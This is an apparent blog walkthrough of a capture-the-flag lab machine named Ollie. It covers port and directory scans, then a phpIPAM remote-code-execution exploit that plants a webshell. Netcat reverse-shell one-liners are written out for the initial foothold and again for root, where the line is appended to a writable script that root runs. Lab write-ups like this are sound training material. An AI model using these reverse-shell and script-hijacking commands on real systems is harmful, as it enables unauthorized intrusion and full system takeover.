THM Ollie

Enumeration
Nmap

The first thing I did was to run nmap against the IP to see any open ports.

└──╼ $sudo nmap -sS -sC -sV -p- 10.10.141.52
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-06 14:18 EST
Nmap scan report for 10.10.141.52
Host is up (0.099s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b7:1b:a8:f8:8c:8a:4a:53:55:c0:2e:89:01:f2:56:69 (RSA)
| 256 4e:27:43:b6:f4:54:f9:18:d0:38:da:cd:76:9b:85:48 (ECDSA)
|_ 256 14:82:ca:bb:04:e5:01:83:9c:d6:54:e9:d1:fa:c4:82 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-title: Ollie :: login
|Requested resource was http://10.10.141.52/index.php?page=login |_http-server-header: Apache/2.4.41 (Ubuntu) | http-robots.txt: 2 disallowed entries |/ /immaolllieeboyyy
1337/tcp open waste?
| fingerprint-strings:
| DNSStatusRequestTCP, GenericLines:
| Hey stranger, I’m Ollie, protector of panels, lover of deer antlers.
| What is your name? What’s up,
| It’s been a while. What are you here for?
| DNSVersionBindReqTCP:
| Hey stranger, I’m Ollie, protector of panels, lover of deer antlers.
| What is your name? What’s up,
| version
| bind
| It’s been a while. What are you here for?
| GetRequest:
| Hey stranger, I’m Ollie, protector of panels, lover of deer antlers.
| What is your name? What’s up, Get / http/1.0
| It’s been a while. What are you here for?
| HTTPOptions:
| Hey stranger, I’m Ollie, protector of panels, lover of deer antlers.
| What is your name? What’s up, Options / http/1.0
| It’s been a while. What are you here for?
| Help:
| Hey stranger, I’m Ollie, protector of panels, lover of deer antlers.
| What is your name? What’s up, Help
| It’s been a while. What are you here for?
| NULL, RPCCheck:
| Hey stranger, I’m Ollie, protector of panels, lover of deer antlers.
| What is your name?
| RTSPRequest:
| Hey stranger, I’m Ollie, protector of panels, lover of deer antlers.
| What is your name? What’s up, Options / rtsp/1.0
|_ It’s been a while. What are you here for?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1337-TCP:V=7.94%I=7%D=12/6%Time=6570C9A4%P=x86_64-pc-linux-gnu%r(NU
SF:LL,59,”Hey\x20stranger,\x20I’m\x20Ollie,\x20protector\x20of\x20panels,\
SF:x20lover\x20of\x20deer\x20antlers.\n\nWhat\x20is\x20your\x20name\?\x20
SF:”)%r(GenericLines,93,”Hey\x20stranger,\x20I’m\x20Ollie,\x20protector\x2
SF:0of\x20panels,\x20lover\x20of\x20deer\x20antlers.\n\nWhat\x20is\x20you
SF:r\x20name\?\x20What’s\x20up,\x20\r\n\r!\x20It’s\x20been\x20a\x20while.
SF:\x20What\x20are\x20you\x20here\x20for\?\x20″)%r(GetRequest,A1,”Hey\x20s
SF:tranger,\x20I’m\x20Ollie,\x20protector\x20of\x20panels,\x20lover\x20of\
SF:x20deer\x20antlers.\n\nWhat\x20is\x20your\x20name\?\x20What’s\x20up,\x
SF:20Get\x20/\x20http/1.0\r\n\r!\x20It’s\x20been\x20a\x20while.\x20What\
SF:x20are\x20you\x20here\x20for\?\x20″)%r(HTTPOptions,A5,”Hey\x20stranger,
SF:\x20I’m\x20Ollie,\x20protector\x20of\x20panels,\x20lover\x20of\x20deer\
SF:x20antlers.\n\nWhat\x20is\x20your\x20name\?\x20What’s\x20up,\x20Option
SF:s\x20/\x20http/1.0\r\n\r!\x20It’s\x20been\x20a\x20while.\x20What\x20a
SF:re\x20you\x20here\x20for\?\x20″)%r(RTSPRequest,A5,”Hey\x20stranger,\x20
SF:I’m\x20Ollie,\x20protector\x20of\x20panels,\x20lover\x20of\x20deer\x20a
SF:ntlers.\n\nWhat\x20is\x20your\x20name\?\x20What’s\x20up,\x20Options\x2
SF:0/\x20rtsp/1.0\r\n\r!\x20It’s\x20been\x20a\x20while.\x20What\x20are\x
SF:20you\x20here\x20for\?\x20″)%r(RPCCheck,59,”Hey\x20stranger,\x20I’m\x20
SF:Ollie,\x20protector\x20of\x20panels,\x20lover\x20of\x20deer\x20antlers\
SF:.\n\nWhat\x20is\x20your\x20name\?\x20″)%r(DNSVersionBindReqTCP,B0,”Hey\
SF:x20stranger,\x20I’m\x20Ollie,\x20protector\x20of\x20panels,\x20lover\x2
SF:0of\x20deer\x20antlers.\n\nWhat\x20is\x20your\x20name\?\x20What’s\x20u
SF:p,\x20\0\x1e\0\x06\x01\0\0\x01\0\0\0\0\0\0\x07version\x04bind\0\0\x10\0
SF:\x03!\x20It’s\x20been\x20a\x20while.\x20What\x20are\x20you\x20here\x20
SF:for\?\x20″)%r(DNSStatusRequestTCP,9E,”Hey\x20stranger,\x20I’m\x20Ollie,
SF:\x20protector\x20of\x20panels,\x20lover\x20of\x20deer\x20antlers.\n\nW
SF:hat\x20is\x20your\x20name\?\x20What’s\x20up,\x20\0\x0c\0\0\x10\0\0\0\0\
SF:0\0\0\0\0!\x20It’s\x20been\x20a\x20while.\x20What\x20are\x20you\x20her
SF:e\x20for\?\x20″)%r(Help,95,”Hey\x20stranger,\x20I’m\x20Ollie,\x20protec
SF:tor\x20of\x20panels,\x20lover\x20of\x20deer\x20antlers.\n\nWhat\x20is\
SF:x20your\x20name\?\x20What’s\x20up,\x20Help\r!\x20It’s\x20been\x20a\x20w
SF:hile.\x20What\x20are\x20you\x20here\x20for\?\x20″);
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 326.43 seconds
dirb

After seeing an open web port, I then perform a dirb scan to fuzz for web directories. In this case I used the ‘-r’ option so that directories wouldn’t be scanned recursively.

└──╼ $dirb http://10.10.141.52 -r

DIRB v2.22

By The Dark Raver

START_TIME: Wed Dec 6 14:35:47 2023
URL_BASE: http://10.10.141.52/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive

GENERATED WORDS: 4612

—- Scanning URL: http://10.10.141.52/ —-
==> DIRECTORY: http://10.10.141.52/api/
==> DIRECTORY: http://10.10.141.52/app/
==> DIRECTORY: http://10.10.141.52/css/
==> DIRECTORY: http://10.10.141.52/db/
==> DIRECTORY: http://10.10.141.52/functions/
==> DIRECTORY: http://10.10.141.52/imgs/

  • http://10.10.141.52/index.php (CODE:302|SIZE:0)
    ==> DIRECTORY: http://10.10.141.52/install/
    ==> DIRECTORY: http://10.10.141.52/javascript/
    ==> DIRECTORY: http://10.10.141.52/js/
    ==> DIRECTORY: http://10.10.141.52/misc/
  • http://10.10.141.52/robots.txt (CODE:200|SIZE:54)
  • http://10.10.141.52/server-status (CODE:403|SIZE:277)
    ==> DIRECTORY: http://10.10.141.52/upgrade/

END_TIME: Wed Dec 6 14:42:39 2023
DOWNLOADED: 4612 – FOUND: 3
gobuster

Finally for the enumeration portion of this machine I used gobuster with a bigger wordlist to continue directory fuzzing.

└──╼ $gobuster dir -u http://10.10.141.52 -x html,xml,jsp,js,txt,asp,bak,php -w /usr/share/wordlists/dirb/big.txt

Gobuster v3.6

by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

[+] Url: http://10.10.141.52
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,xml,jsp,js,txt,asp,bak,php

[+] Timeout: 10s

Starting gobuster in directory enumeration mode

/.htaccess (Status: 403) [Size: 277]
/.htaccess.bak (Status: 403) [Size: 277]
/.htaccess.php (Status: 403) [Size: 277]
/.htaccess.html (Status: 403) [Size: 277]
/.htaccess.xml (Status: 403) [Size: 277]
/.htaccess.jsp (Status: 403) [Size: 277]
/.htaccess.txt (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/.htaccess.asp (Status: 403) [Size: 277]
/.htpasswd.php (Status: 403) [Size: 277]
/.htaccess.js (Status: 403) [Size: 277]
/.htpasswd.html (Status: 403) [Size: 277]
/.htpasswd.xml (Status: 403) [Size: 277]
/.htpasswd.jsp (Status: 403) [Size: 277]
/.htpasswd.txt (Status: 403) [Size: 277]
/.htpasswd.js (Status: 403) [Size: 277]
/.htpasswd.asp (Status: 403) [Size: 277]
/.htpasswd.bak (Status: 403) [Size: 277]
/api (Status: 301) [Size: 310] [–> http://10.10.141.52/api/]
/app (Status: 301) [Size: 310] [–> http://10.10.141.52/app/]
/config.php (Status: 200) [Size: 0]
/css (Status: 301) [Size: 310] [–> http://10.10.141.52/css/]
/db (Status: 301) [Size: 309] [–> http://10.10.141.52/db/]
/functions (Status: 301) [Size: 316] [–> http://10.10.141.52/functions/]
/imgs (Status: 301) [Size: 311] [–> http://10.10.141.52/imgs/]
/index.php (Status: 302) [Size: 0] [–> http://10.10.141.52/index.php?page=login]
/install (Status: 301) [Size: 314] [–> http://10.10.141.52/install/]
/javascript (Status: 301) [Size: 317] [–> http://10.10.141.52/javascript/]
/js (Status: 301) [Size: 309] [–> http://10.10.141.52/js/]
/misc (Status: 301) [Size: 311] [–> http://10.10.141.52/misc/]
/robots.txt (Status: 200) [Size: 54]
/robots.txt (Status: 200) [Size: 54]
/server-status (Status: 403) [Size: 277]
/upgrade (Status: 301) [Size: 314] [–> http://10.10.141.52/upgrade/]

Progress: 184221 / 184230 (100.00%)

Finished

Initial Foothold

Initially I was intrigued by what was running on port 1337. I decided to connect to this with netcat to see what happened.

nc -nv 1337

Once connected, I received a number of messages with prompts from Ollie the dog playing a game. Once completed, Ollie rewards you with a set of credentials. These are used to login to the IPAM web interface found on port 80, (the HTTP service).

I then used these credentials to log in to the web interface at http:// and noted the software running and the version number. I quickly noticed this version of phpIPAM is vulnerable to an RCE exploit. This is 50963 on ExploitDB or searchsploit. Upon following the directions and running the exploit, a webshell is created at http://evil.php. From here, it’s possible to get a reverse shell. Open up a netcat listener on the local machine.
nc -nlvp 4444 then run the below command on the webshell after running it through a URL encoder.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4444 >/tmp/f

This gives you a reverse shell as www-data.

Escalate to Ollie

First I converted my shell to a TTY by:

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
From here, I was having issues finding a clear escalation method until I thought to switch to the Ollie user with the password I found previously. This worked, so I was able to gain access to Ollie’s account and the user flag.

Root Escalation

Here again I was having issues finding a method to move to the root account. I had a suspicion that perhaps the root account was running a process in the background that I could manipulate, so I transferred pspy64 to the machine and ran it. It wasn’t long before I noticed something odd.
CMD: UID=0 PID=1957 | /bin/bash /usr/bin/feedme

I checked the file type and permissions on feedme and learned it was a shell script that the Ollie account had read/write access to. Knowing this, I opened an additional netcat listener on my local machine with a different port, and ran the below command to append a second reverse shell to the bash script.

echo ‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc >/tmp/f’

From here, all I had to do was wait for the root shell to pop and was able to gain root access

I am sorry for any formatting oddities here, I’m learning that WordPress by itself doesn’t like Markdown very well.